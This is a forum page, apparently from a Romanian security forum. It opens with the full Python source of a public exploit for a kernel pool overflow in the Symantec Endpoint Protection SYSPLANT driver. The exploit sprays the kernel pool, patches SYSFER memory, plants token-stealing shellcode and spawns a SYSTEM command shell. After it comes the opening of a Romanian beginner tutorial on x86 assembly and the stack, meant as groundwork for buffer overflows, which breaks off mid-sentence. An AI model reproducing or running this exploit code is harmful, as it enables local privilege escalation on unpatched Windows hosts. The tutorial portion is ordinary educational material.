[h=1]Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow[/h] # Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow# http://www.offensive-security.com # Tested on Windows 7 # http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/ # Authors: Matteo 'ryujin' Memelli & Alexandru 'sickness' Uifalvi <at> offensive-security.com from ctypes import * from ctypes.wintypes import * import struct, sys, os, time ntdll = windll.ntdll kernel32 = windll.kernel32 TH32CS_SNAPPROCESS = 0x02 PROCESS_ALL_ACCESS = 0x1fffff FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 NULL = 0x0 MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 PAGE_EXECUTE_READWRITE = 0x00000040 SystemExtendedHandleInformation = 64 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_INVALID_HANDLE = 0xC0000008 STATUS_SUCCESS = 0 PVOID = c_void_p HANDLE = c_void_p class LSA_UNICODE_STRING(Structure): """Represent the LSA_UNICODE_STRING on ntdll.""" _fields_ = [ ("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", LPWSTR), ] class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" _fields_ = [ ("Object", PVOID), ("UniqueProcessId", ULONG), ("HandleValue", ULONG), ("GrantedAccess", ULONG), ("CreatorBackTraceIndex", USHORT), ("ObjectTypeIndex", USHORT), ("HandleAttributes", ULONG), ("Reserved", ULONG), ] class SYSTEM_HANDLE_INFORMATION_EX(Structure): """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" _fields_ = [ ("NumberOfHandles", ULONG), ("Reserved", ULONG), ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), ] class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" _fields_ = [ ("Name", LSA_UNICODE_STRING), ("Reserved", ULONG * 22), ] class PROCESSENTRY32(Structure): _fields_ = [ ("dwSize", c_ulong), ("cntUsage", c_ulong), ("th32ProcessID", c_ulong), ("th32DefaultHeapID", c_int), ("th32ModuleID", c_ulong), ("cntThreads", c_ulong), ("th32ParentProcessID", c_ulong), ("pcPriClassBase", c_long), ("dwFlags", c_ulong), ("szExeFile", c_wchar * MAX_PATH) ] Process32First = kernel32.Process32FirstW Process32Next = kernel32.Process32NextW def header(): """Print exploit header""" print "[+] Sysplant 0x0222084 Kernel Pool Overflow" print "[+] Product: Symantec Endpoint Protection" print "[+] Authors: Matteo 'ryujin' Memelli & Alexandru 'sickness' Uifalvi <at> offensive-security.com" def getLastError(): """Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), NULL, buf, sizeof(buf), NULL): print "[-] " + buf.value else: print "[-] Unknown Error" def signed_to_unsigned(signed): """Convert signed to unsigned integer""" unsigned, = struct.unpack ("L", struct.pack ("l", signed)) return unsigned def get_type_info (handle): """Get the handle type information.""" public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() size = DWORD(sizeof(public_object_type_information)) while True: result = signed_to_unsigned( ntdll.NtQueryObject( handle, 2, byref(public_object_type_information), size, None)) if result == STATUS_SUCCESS: return public_object_type_information.Name.Buffer elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(public_object_type_information, size.value) elif result == STATUS_INVALID_HANDLE: return None else: raise x_file_handles("NtQueryObject.2", hex (result)) def get_handles(): """Return all the processes handles in the system atm.""" system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() size = DWORD (sizeof (system_handle_information)) while True: result = ntdll.NtQuerySystemInformation( SystemExtendedHandleInformation, byref(system_handle_information), size, byref(size) ) result = signed_to_unsigned(result) if result == STATUS_SUCCESS: break elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(system_handle_information, size.value) else: raise x_file_handles("NtQuerySystemInformation", hex(result)) pHandles = cast( system_handle_information.Handles, POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ system_handle_information.NumberOfHandles) ) for handle in pHandles.contents: yield handle.UniqueProcessId, handle.HandleValue, handle.Object def getppid(mypid=None, rec=False): """ Get Parent Process """ pe = PROCESSENTRY32() pe.dwSize = sizeof(PROCESSENTRY32) if not mypid: mypid = kernel32.GetCurrentProcessId() snapshot = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) result = 0 try: have_record = Process32First(snapshot, byref(pe)) while have_record: if mypid == pe.th32ProcessID: if rec: result = getppid(pe.th32ParentProcessID, False) break else: result = pe.th32ParentProcessID break have_record = Process32Next(snapshot, byref(pe)) finally: kernel32.CloseHandle(snapshot) return result def getSysFerPointer(phandle): """ Get child_block and child_block_size variable addresses """ csysfer = create_string_buffer("SYSFER.dll", len("SYSFER.dll")) hsysfer = kernel32.LoadLibraryA(addressof(csysfer)) if not hsysfer: print "[-] LoadLibrary Failed!" sys.exit() print "[+] SYSFER Base address %s" % hex(hsysfer) cscb = create_string_buffer("child_block", len("child_block")) sysfer_child_block = kernel32.GetProcAddress(hsysfer, addressof(cscb)) if not sysfer_child_block: print "[-] GetProcAddress Failed!" sys.exit() print "[+] SYSFER!child_block ptr @ %s" % hex(sysfer_child_block) cscbs = create_string_buffer("child_block_size", len("child_block_size")) sysfer_child_block_s = kernel32.GetProcAddress(hsysfer, addressof(cscbs)) if not sysfer_child_block_s: print "[-] GetProcAddress Failed!" sys.exit() print "[+] SYSFER!child_block_size ptr @ %s" % hex(sysfer_child_block_s) child_block = c_ulong(0) read = c_ulong(0) # Read child_block address res = kernel32.ReadProcessMemory(phandle, sysfer_child_block, byref(child_block), sizeof(c_ulong), byref(read)) if res == 0 or res == -1: print "[-] ReadProcessMemory Failed!" getLastError() sys.exit() # Read child_block_size child_block_s = c_ulong(0) res = kernel32.ReadProcessMemory(phandle, sysfer_child_block_s, byref(child_block_s), sizeof(c_ulong), byref(read)) if res == 0 or res == -1: print "[-] ReadProcessMemory Failed!" getLastError() sys.exit() print "[+] SYSFER Pointer retrieved successfully!" return child_block, child_block_s, sysfer_child_block, sysfer_child_block_s def craftSysFerData(phandle, sysfer_child_block, sysfer_child_block_s, evil_child_block, evil_child_block_size): """ Replace SysFerData to control memcpy source buffer """ wrote = c_ulong(0) ecb = struct.pack("<L", evil_child_block) cecb = create_string_buffer(ecb, 0x4) print "[+] Patching %x with %x" % (sysfer_child_block, evil_child_block) res = kernel32.WriteProcessMemory(phandle, sysfer_child_block, addressof(cecb), 0x4, byref(wrote)) if res == 0 or res == -1: getLastError() sys.exit() ecbs = struct.pack("<L", evil_child_block_size) csrc = create_string_buffer(ecbs, 0x4) print "[+] Patching %x with %s" % (sysfer_child_block_s, hex(evil_child_block_size)) res = kernel32.WriteProcessMemory(phandle, sysfer_child_block_s, addressof(csrc), 0x4, byref(wrote)) if res == 0 or res == -1: getLastError() sys.exit() print "[+] SYSFER.DLL patched successfully!" def allocShellcode(): """ Allocate OkayToCloseProcedure ptr and shellcode """ baseadd = c_int(0x00000004) null_size = c_int(0x1000) tokenstealing = ( "\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80" "\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04" "\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10" "\x00" ) OkayToCloseProcedure = struct.pack("<L", 0x00000078) sc = "\x42" * 0x70 + OkayToCloseProcedure # 83C6 0C ADD ESI,0C # C706 0A000800 MOV DWORD PTR DS:[ESI],8000A # 83EE 0C SUB ESI,0C sc += "\x83\xC6\x0C\xC7\x06\x0A\x00\x08\x00\x83\xEE\x0C" # RESTORE TypeIndex sc += tokenstealing sc += "\x90" * (0x400-len(sc)) ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, POINTER(c_int), c_int, c_int] dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) if dwStatus != STATUS_SUCCESS: print "[+] Error while allocating the null paged memory: %s" % dwStatus getLastError() sys.exit() written = c_ulong() alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000004, sc, 0x400, byref(written)) if alloc == 0: print "[+] Error while writing our junk to the null paged memory: %s" %\ alloc getLastError() sys.exit() def allocInput(phandle, evil_child_block_size): """ Allocate the source buffer in the parent process """ v = kernel32.VirtualAllocEx(phandle, 0x0, evil_child_block_size, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 8654c580 040c0090 ef436f49 00000000 0000005c # 8654c590 00000000 00000000 00000001 00000001 # 8654c5a0 00000000 0008000a quota = "\x00\x00\x00\x00" header = "\x90\x00\x0c\x04\x49\x6f\x43\xef\x00\x00\x00\x00\x5c\x00\x00\x00" header += "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" header += "\x00\x00\x00\x00" TypeIndex = "\x00\x00\x08\x00" offset = "\x45" * (evil_child_block_size-len(header)-len(TypeIndex)-\ len(quota)) overflow = offset + quota + header + TypeIndex csrc = create_string_buffer(overflow, evil_child_block_size) wrote = c_ulong(0) res = kernel32.WriteProcessMemory(phandle, v, addressof(csrc), evil_child_block_size, byref(wrote)) if res == 0 or res == -1: getLastError() sys.exit() print "[+] evil_child_block address: %s" % hex(v) return v def triggerIOCTL(): """ Trigger the vulnerable IOCTL code """ GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE_NAME = u"\\\\.\\SYSPLANT" dwReturn = c_ulong() driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) if not driver_handle or driver_handle == -1: getLastError() sys.exit() ioctl = 0x00222084 evil_input = "\x41" * 4 + struct.pack("<L", ioctl) + "D" * 56 evil_size = len(evil_input) print "[+] IOCTL: %s" % hex(ioctl) print "[+] Buf size: %d" % evil_size einput = create_string_buffer(evil_input, evil_size) eoutput = create_string_buffer("\x00"*1024, 1024) dev_ioctl = kernel32.DeviceIoControl(driver_handle , ioctl, addressof(einput) , evil_size, addressof(eoutput), 1024, byref(dwReturn) , None) def spray(): """Spray the Kernel Pool with IoCompletionReserve Objects. Each object is 0x60 bytes in length and is allocated from the Nonpaged kernel pool""" global handles, done handles = {} IO_COMPLETION_OBJECT = 1 for i in range(0, 50000): hHandle = HANDLE(0) ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT) #print "[+] New Object created successfully, handle value: ", hHandle handles[hHandle.value]=hHandle print "[+] Spray done!" def findMemoryWindows(): """ Find all possible windows of 0x480 bytes with a further adjacent IoCompletionReserve object that we can overwrite. Finally trigger 0x00222084 to allocate the IOCTL input buffer in one of the windows. The IOCTL input buffer has been changed to avoid the overflow at this time, so that we can study the allocations without BSODing the box""" global handles, done mypid = os.getpid() khandlesd = {} khandlesl = [] # Leak Kernel Handles for pid, handle, obj in get_handles(): #print handle, obj if pid==mypid and get_type_info(handle)=="IoCompletionReserve": khandlesd[obj] = handle khandlesl.append(obj) # Find holes and make our allocation holes = [] for obj in khandlesl: # obj address is the handle address, but we want to allocation # address, so we just remove the size of the object header from it. # IoCompletionReserve Chunk Header 0x30 alloc = obj-0x30 # Get allocations at beginning of the page if (alloc&0xfffff000) == alloc: # find holes # If we get a KeyError allocations are not adjecient try: holes.append( ( khandlesd[obj+0x580],khandlesd[obj+0x520], khandlesd[obj+0x4c0],khandlesd[obj+0x460], khandlesd[obj+0x400],khandlesd[obj+0x3a0], khandlesd[obj+0x340],khandlesd[obj+0x2e0], khandlesd[obj+0x280],khandlesd[obj+0x220], khandlesd[obj+0x1c0],khandlesd[obj+0x160], khandlesd[obj+0x100]) ) print "[+] Hole Window found @ %s" % hex(alloc) except KeyError: pass # Create Memory Windows of 0x480 bytes (0x60*12) ... print " [*] Your IOCTL Allocation will be @ 0x*****100" print " [*] The Overflown Allocation will be @ 0x*****580" for hole in holes: kernel32.CloseHandle(handles[ hole[1] ]) kernel32.CloseHandle(handles[ hole[2] ]) kernel32.CloseHandle(handles[ hole[3] ]) kernel32.CloseHandle(handles[ hole[4] ]) kernel32.CloseHandle(handles[ hole[5] ]) kernel32.CloseHandle(handles[ hole[6] ]) kernel32.CloseHandle(handles[ hole[7] ]) kernel32.CloseHandle(handles[ hole[8] ]) kernel32.CloseHandle(handles[ hole[9] ]) kernel32.CloseHandle(handles[ hole[10] ]) kernel32.CloseHandle(handles[ hole[11] ]) kernel32.CloseHandle(handles[ hole[12] ]) # Make our Alloc of 0x480 bytes... triggerIOCTL() # trigger code execution for hole in holes: kernel32.CloseHandle(handles[ hole[0] ]) # Spawn a system shell os.system("cmd.exe /T:C0 /K cd C:\\Windows\\system32\\") done = False if __name__ == '__main__': global handles, done exploit = False done = True header() try: if sys.argv[1].lower() == 'exploit': exploit = True except IndexError: pass if not exploit: print "[+] Patching Input buffer from SYSFER Memory" phandle = c_ulong() # Use the following with Pyinstaller (2 parent processes) # parentpid = getppid(None, True) # Use the following from python script (parent is cmd.exe) # 1) parentpid = getppid(None, False) print "[+] Parent PID: %d" % parentpid # 2) phandle = kernel32.OpenProcess(PROCESS_ALL_ACCESS, 0x0, parentpid) print "[+] Parent Handle: %d" % phandle # 3) child_block,child_block_s,sysfer_child_block,sysfer_child_block_s =\ getSysFerPointer(phandle) evil_child_block_size = 0x44c # pool overflow and TypeIndex overwrite # 4) evil_child_block = allocInput(phandle, evil_child_block_size) # 5) craftSysFerData(phandle, sysfer_child_block, sysfer_child_block_s, evil_child_block, evil_child_block_size) kernel32.CloseHandle(phandle) print "[+] NOW RUN %s exploit" % sys.argv[0] sys.exit() # 6) Alloc shellcode allocShellcode() # 7) Spray #spray() dwThreadId1 = c_ulong(0) THREADFUNC = CFUNCTYPE(None) spray_thread = THREADFUNC(spray) hThread1 = HANDLE(0) hThread1 = windll.kernel32.CreateThread(0,0,spray_thread,0,0,byref(dwThreadId1)) print "[+] Spray Thread Created TID: %d" % hThread1 curpr = windll.kernel32.GetThreadPriority(hThread1) print "[+] Current priority: %d" % curpr print "[+] Setting high priority...." windll.kernel32.SetThreadPriority(hThread1, 2) curpr = windll.kernel32.GetThreadPriority(hThread1) time.sleep(3) # 8) Create holes to fit our allocation and trigger the IOCTL #findMemoryWindows() dwThreadId2 = c_ulong(0) findMemoryWindows_thread = THREADFUNC(findMemoryWindows) hThread2 = HANDLE(0) hThread2 = windll.kernel32.CreateThread(0,0,findMemoryWindows_thread,0,0,byref(dwThreadId2)) print "[+] findMemoryWindows Thread Created TID: %d" % hThread2 curpr = windll.kernel32.GetThreadPriority(hThread2) print "[+] Current priority: %d" % curpr print "[+] Setting high priority...." windll.kernel32.SetThreadPriority(hThread2, 2) curpr = windll.kernel32.GetThreadPriority(hThread2) while done: time.sleep(1) Sursa: http://www.exploit-db.com/exploits/34272/

Introducere Am decis sa scriu un astfel de tutorial deoarece nu am mai vazut niciun astfel de articol scris in limba romana care sa explice pe intelesul tuturor care este cauza acestor probleme dar si cum se pot exploata. Tutorialul se adreseaza incepatorilor, dar sunt necesare cel putin cunostinte de programare C/C++ pentru a putea intelege conceptele. Sistemul pe care vom descoperi si exploata problema este Windows XP (pe 32 de biti) din motive de simplitate: nu exista ASLR, o notiune pe care o vom discuta in detaliu mai jos. Vreau sa incep cu o scurta introducere in limbaje de asamblare. Nu voi prezenta in detaliu, dar voi descrie pe scurt notiunile necesare pentru a intelege cum apare un "buffer overflow" si cum se poate exploata. Exista mai multe tipuri de buffer overflow-uri, aici il vom discuta pe cel mai simplu, stack based buffer overflow. Daca doriti acest articol in format PDF, il puteti descarca de aici: https://rstforums.com/fisiere/SBOF.pdf Introducere in ASM Pentru a ma asigura ca inteleg toti programatorii C/C++, voi explica ce se intampla cu codul C/C++ cand este compilat. Un programator scrie codul: #include <stdio.h> int main() { puts("RST rullz"); return 0; } Compilatorul va translata aceste instructiuni in limbaj de asamblare apoi aceste intructiuni vor fi transpuse in "cod masina" (cunoscut si ca shellcode). Exemplu, intructiunile in limbaj de asamblare: [B][COLOR=#0000ff]PUSH [/COLOR][/B]OFFSET [COLOR=#ff0000]SimpleEX.??_C@_09GGKPFABJ@RST?5rullz?$AA@[/COLOR] ; /s = "RST rullz"[B][COLOR=#0000ff]CALL [/COLOR][/B]DWORD PTR [B][COLOR=#008000]DS[/COLOR][/B]:[<&[COLOR=#ff0000]MSVCR100.puts[/COLOR]>] ; \puts[B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]ESP[/COLOR][/B],[COLOR=#ff0000]4[/COLOR][B][COLOR=#0000ff]XOR [/COLOR][COLOR=#008000]EAX[/COLOR][/B],[B][COLOR=#008000]EAX[/COLOR][/B][COLOR=#0000ff][B]RETN[/B][/COLOR] Nu e nevoie sa intelegeti deocamdata ce se intampla acolo. Apoi, acest cod e reprezentabil in cod masina: 68 F4200300 [B][COLOR=#0000ff]PUSH [/COLOR][/B]OFFSET [COLOR=#ff0000]SimpleEX.??_C@_09GGKPFABJ@RST?5rullz?$AA@[/COLOR] ; /s = "RST rullz"FF15 A0200300 [B][COLOR=#0000ff]CALL [/COLOR][/B]DWORD PTR [B][COLOR=#008000]DS[/COLOR][/B]:[<&[COLOR=#ff0000]MSVCR100.puts[/COLOR]>] ; \puts83C4 04 [B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]ESP[/COLOR][/B],[COLOR=#ff0000]4[/COLOR]33C0 [B][COLOR=#0000ff]XOR [/COLOR][COLOR=#008000]EAX[/COLOR][/B],[B][COLOR=#008000]EAX[/COLOR][/B]C3 [B][COLOR=#0000ff]RETN[/COLOR][/B] Se poate vedea ca acum avem in plus o serie de octeti: 0x68 0xF4 0x20 0x03 0x00 0xFF 0x15 0xA0 0x20 0x03 0x00 0x83 0xC4 0x04 0x33 0xC0 0xC3. Prin acei octeti din dreptul lor sunt reprezentate si intelese de catre procesor instructiunile. Cu alte cuvinte, procesorul va citi aceasta serie de octeti si le va interpreta ca pe instructiunile din limbajul de asamblare. Procesorul nu stie de variabilele din C. Procesorul are propriile sale "variabile", mai exact fiecare procesor are doar niste registri in care poate memora date. Acesti registri sunt urmatorii (doar cei necesari): - EAX, EBX, ECX, EDX, ESI, EDI - Registrii generali care memoreaza date - EIP - Registru special: un program care executa rand pe rand fiecare instructiune a sa (din ASM). Sa zicem ca prima instructiune se afla in memorie la adresa 0x10000000. O instructiune poate sa aiba unu sau mai multi octeti. Sa presupunem ca are 3 octeti. Initial, valoarea acestui registru e 0x10000000. Dupa ce procesorul executa acea instructiune, valoarea registrului va fi schimbata la 0x10000003 - ESP - Stack pointer. Vom discuta mai in detaliu stack-ul ulterior. Pentru moment e de ajuns sa intelegeti ca stack-ul se afla in memorie si acest registru memoreaza adresa de memorie la care se afla varful stivei (stack). Mai exista de asemenea registru EBP care reprezinta "baza stivei" Toti acesti registri au 4 octeti. Acel "E" vine de la "Extended" deoarece procesoarele pe 16 biti aveau registri pe 16 biti: AX, BC, CX, DX. Informativ, pe sistemele pe 64 de biti, registrii sunt: RAX, RBX... Un concept extrem de important si care trebuie inteles cand vine vorba de limbaje de asamblare il reprezinta stiva (stack). Stiva e o structura de date in care datele (elementele de pe stiva) sunt puse "una peste alta" si la un moment dat poate fi scos de pe stiva doar elementul din varful stivei. Sau, cum explica o doamna profesoara de la Universitate, o stiva este ca niste farfurii puse una peste alta: cand adaugi una, o pui peste celelalte, iar cand vrei sa scoti una, o scoti mai intai pe cea din varf. Stiva este foarte folosita la nivel de procesor deoarece: - variabilele locale dintr-o functie sunt puse pe stiva - parametrii cu care e apelata o functie sunt pusi pe stiva Exista doua notiuni importante care trebuie intelese cand se lucreaza cu procesoare Intel: - procesoarele sunt little endian: mai exact, daca aveti o variabila int x = 0x11223344, aceasta nu se va afla in memorie ca "0x11223344" ci ca "0x44332211" - cand se adauga un element pe stiva, valoarea ESP-ului, registru care memoreaza varful stivei, va scadea! Exista doua intructiuni folosite pentru a lucra cu stiva: - PUSH - va pune o valoare (pe 32 de biti) pe stiva - POP - va scoate o valoare (pe 32 de biti) de pe stiva Exemplu de stiva: 24 - 1111 28 - 2222 32 - 3333 Prima coloana o reprezinta valoarea varfului stivei, valoare care scade cand se adauga un nou element, iar a doua coloana contine niste valori aleatoare. Sa adaugam doua elemente pe stiva: PUSH 5555 PUSH 6666 Stiva va arata astfel: 16 - 6666 20 - 5555 24 - 1111 28 - 2222 32 - 3333 Ca sa intelegeti mai usor cum valoarea ESP-ului, registrul care contine un pointer la varful stivei, scade cand sunt puse date pe stiva, priviti acest registru ca pe o valoare "spatiu disponibil pe stiva" care scade cand sunt adaugate date. Dupa cum am exemplificat si mai sus, la fel ca PUSH si POP, procesorul executa "instructiuni" pentru a-si face datoria. Fiecare instructiune are rolul sau, asa cum PUSH pune un element pe stiva si POP il scoate, alte instructiuni realizeaza: - ADD - Face o adunare - SUB - Face o scadere - CALL - Apeleaza o functie - RETN - Returneaza dintr-o functie - JMP - Sare la o adresa - XOR - Operatie binara, dar "XOR EAX, EAX" de exemplu e echivalentul mai optim al atribuirii EAX = 0 - MOV - Face o atribuire - INC - Incrementeaza o valoare (variabila++) - DEC - Decrementeaza o valoare (variabila--) Exista foarte multe astfel de instructiuni, dar acestea ar fi cele mai importante. Sa vedem cateva exemple: - ADD EAX, 5 ; Adauga valoarea 5 la registrul EAX. Adica EAX = EAX + 5 - SUB EDX, 7 ; Scade 5 din valoarea registrului EDX - CALL puts ; Apeleaza functia puts - RETN ; return-ul din C - JMP 0x11223344 ; Sare la instructiunea de la acea adresa - XOR EBX, EBX ; Echivalentul pentru EBX = 0 - MOV ECX, 3 ; Echivalentul pentru ECX = 3 - INC ECX; Echivalentul pentru ECX++ - DEC ECX ; Echivalentul pentru ECX-- Cred ca e destul de usor de inteles. Acum putem intelege ce face mai exact procesorul cu codul nostru care afiseaza un simplu mesaj: 1. PUSH OFFSET SimpleEX.@_rst_@ - Am inlocuit acel sir urat cu ceva mai simplu: este de fapt un pointer la sirul de caractere "RST rullz" din memorie. Instructiunea pune pe stiva pointerul la acest sir. Are ca efect scaderea a 4 octeti (sistem pe 32 de biti) din ESP. Adica "ESP = ESP -4" 2. CALL DWORD PTR DS:[<&MSVCR100.puts>] - Apeleaza functia "puts" din biblioteca "MSVCR100.dll" (Microsoft Visual C Runtime v10) folosita de Visual Studio 2010. Vom detalia mai jos ca pentru a apela o functie, trebuie mai intai sa punem parametrii pe stiva 3. ADD ESP,4 - Acel PUSH a avut ca efect scaderea a 4 octeti necesari pentru a apela functia, acum ii vom elibera de pe stiva adaugand 4 octeti 4. XOR EAX,EAX - Inseamna EAX = 0. Intr-o functie, la return, valoarea returnata va fi continuta de acest registru 5. RETN - Facem "return" din functie Pentru a intelege mai bine cum functioneaza un apel de functie luam urmatorul exemplu: #include <stdio.h>int functie(int a, int { return a + b; } int main() { functie(5, 6); return 0; } Functia "main" va arata astfel: [B][COLOR=#0000ff]PUSH [/COLOR][COLOR=#008000]EBP[/COLOR][/B][COLOR=#0000ff][B]MOV [/B][/COLOR][B][COLOR=#008000]EBP[/COLOR][/B],[COLOR=#008000][B]ESP[/B][/COLOR][COLOR=#0000ff][B]PUSH [/B][/COLOR][COLOR=#ff0000]6[/COLOR] [COLOR=#0000ff][B]PUSH [/B][/COLOR][COLOR=#ff0000]5 [/COLOR][COLOR=#0000ff][B]CALL [/B][/COLOR][COLOR=#ff0000]SimpleEX.functie [/COLOR] [COLOR=#0000ff][B]ADD [/B][/COLOR][COLOR=#008000][B]ESP[/B][/COLOR],[COLOR=#ff0000]8[/COLOR][COLOR=#0000ff][B]XOR [/B][/COLOR][COLOR=#008000][B]EAX[/B][/COLOR],[COLOR=#008000][B]EAX[/B][/COLOR][COLOR=#0000ff][B]POP [/B][/COLOR][COLOR=#008000][B]EBP[/B][/COLOR][COLOR=#0000ff][B]RETN[/B][/COLOR] Iar "functie" va fi de forma: [B][COLOR=#0000ff]PUSH [/COLOR][COLOR=#008000]EBP[/COLOR][/B][B][COLOR=#0000ff]MOV [/COLOR][COLOR=#008000]EBP[/COLOR][/B],[B][COLOR=#008000]ESP[/COLOR][/B][B][COLOR=#0000ff]MOV [/COLOR][COLOR=#008000]EAX[/COLOR][/B],DWORD PTR [B][COLOR=#008000]SS[/COLOR][/B]:[[B][COLOR=#008000]EBP[/COLOR][/B]+[COLOR=#ff0000]8[/COLOR]][B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]EAX[/COLOR][/B],DWORD PTR [B][COLOR=#008000]SS[/COLOR][/B]:[[B][COLOR=#008000]EBP[/COLOR][/B]+[COLOR=#ff0000]C[/COLOR]][B][COLOR=#0000ff]POP [/COLOR][/B][COLOR=#008000][B]EBP[/B][/COLOR][B][COLOR=#0000ff]RETN[/COLOR][/B] Nota: Visual Studio e al dracu de destept (nu sunt ironic) si a facut calculele astfel incat nu mai exista niciun apel catre o alta functie, ci doar o valoare 0xB (adica 11, adica 5+6). Pentru teste puteti dezactiva complet optimizarile din Properties > C++ > Optimization. Se pot observa cateva instructiuni: - PUSH EBP (la inceputul functiilor) - MOV EBP,ESP (la inceputul functiilor) - POP EBP (la final) Ei bine, aceste instructiuni au rolul de a crea "stack frame-uri". Mai exact, au rolul de a "separa" cumva functiile pe stiva, astfel incat registrii EBP si ESP (registrii care contin valorile ce reprezinta baza si varful stivei) sa delimiteze stiva folosita de catre functia respectiva. Spus altfel, cum fiecare functie poate avea propriile variabile, folosind aceste instructiuni, registrul EBP va contine adresa de unde incep datele folosite de functia care a fost apelata, iar ESP va contine varful stivei. Intre valorile ESP - EBP (ESP este mai mic) se afla datele folosite de functie. Sa incepem cu functia care realizeaza adunarea: - MOV EAX,DWORD PTR SS:[EBP+8] - ADD EAX,DWORD PTR SS:[EBP+C] Nu va speriati de acesti DWORD PTR SS:[EBP+8] si DWORD PTR SS:[EBP+C]. Asa cum am discutat anterior, intre EBP si ESP se afla datele folosite de functie. In cazul de fata, aceste date sunt parametrii cu care a fost apelata functia. Acesti parametri se afla pe stiva si sunt accesibili la locatiile EBP+8 si EBP+C, adica la 8 respectiv 12 octeti fata de registrul EBP. De asemenea, in ASM, parantezele patrate sunt folosite ca si "*" in C/C++ cand e vorba de pointeri. Asa cum *p inseamna "valoarea de la adresa p" asa [EBP] inseamna "valoarea de la adresa EBP". E nevoie de o astfel de abordare deoarece EBP contine o adresa de memorie (de pe stiva) si noi avem nevoie de valorile de la adresele respective de memorie. O alta notiune utila este faptul ca "DWORD" specifica faptul ca la acea adresa se afla o valoare pe 4 octeti. Exista cateva tipuri de date care specifica dimensiunile datelor cu care se lucreaza: - BYTE - 1 octet - WORD - 2 octeti - DWORD - 4 octeti Acei SS (Stack Segment) sau DS (Data Segment) sau CS (Code Segment) reprezinta alti registrii care identifica diverse zone/segmente de memorie: stiva, date sau cod, fiecare dintre acestea avand anumite drepturi de acces: read, write sau execute. Functia pune in EAX valoarea primului parametru (a) si adauga la aceasta valoarea celui de-al doilea parametru (. Astfel EAX contine a+b. Trecem acum la ceea ce ne intereseaza de fapt si anume cum se realizeaza apelul unei functii: [B][COLOR=#0000ff]PUSH [/COLOR][/B][COLOR=#ff0000]6[/COLOR] [B][COLOR=#0000ff]PUSH [/COLOR][/B][COLOR=#ff0000]5[/COLOR] [B][COLOR=#0000ff]CALL [/COLOR][/B][COLOR=#ff0000]SimpleEX.functie[/COLOR] [B][COLOR=#0000ff]ADD [/COLOR][COLOR=#008000]ESP[/COLOR][/B],[COLOR=#ff0000]8[/COLOR] Ne amintim ca apelul este "functie(5, 6)". Ei bine, pentru a apela o functie se executa urmatorii pasi: 1. Se pun pe stiva parametrii de la dreapta la stanga. Adica mai intai 6, apoi 5 2. Se apeleaza functia 3. Se elibereaza stiva, se curata parametrii de pe stiva Astfel, mai intai se pun pe stiva doua valori (32 de biti, adica 4 octeti fiecare): 6 apoi 5, se apeleaza functia si apoi se curata stiva: ESP-ul devine ESP+8 (spatiul ocupat de catre cei doi parametri ai functiei) astfel incat ajunge la valoarea initiala, de dinainte de apelul de functie. Am discutat anterior ca pentru eliminarea datelor de pe stiva se poate folosi instructiunea POP, insa nu avem nevoie de POP deoarece nu ne intereseaza valorile de pe stiva, iar in acest caz ar fi nevoie de doua instructiuni POP pentru a elibera stiva. Daca am avea 100 de parametri la o functie ar trebui sa facem 100 de POP-uri, putem rezolva aceasta problema cu o simpla astfel de adunare. Nota: E important dar nu e in scopul acestui tutorial: exista mai multe metode de a apela o functie. Aceasta metoda, care presupune adaugarea parametrilor pe stiva de la dreapta la stanga, apoi eliberarea stivei DUPA apelul functie se numeste "cdecl". Alte functii, precum cele ale sistemului de operare Windows, folosesc o alta metoda de a apela functiile (numita calling convention) numita "stdcall" si care presupune de asemenea punerea parametrilor functiilor pe stiva de la dreapta la stanga, DAR curatarea stivei se face in interiorul functiei, nu dupa apelul acesteia. Un alt lucru important la apelul unei functii este urmatorul, apel realizat folosind intructiunea "call" il reprezinta faptul ca adresa imediat urmatoare instructiunii call care apeleaza functia, este pusa pe stiva! Exemplu: 00261013 | PUSH 6 ; /Arg2 = 00000006 00261015 | PUSH 5 ; |Arg1 = 00000005 00261017 | CALL SimpleEX.functie ; \functie 0026101C | ADD ESP,8 In stanga se afla adresele de memorie la care se afla instructiunile respective. Instructiunile PUSH 5 si PUSH 6 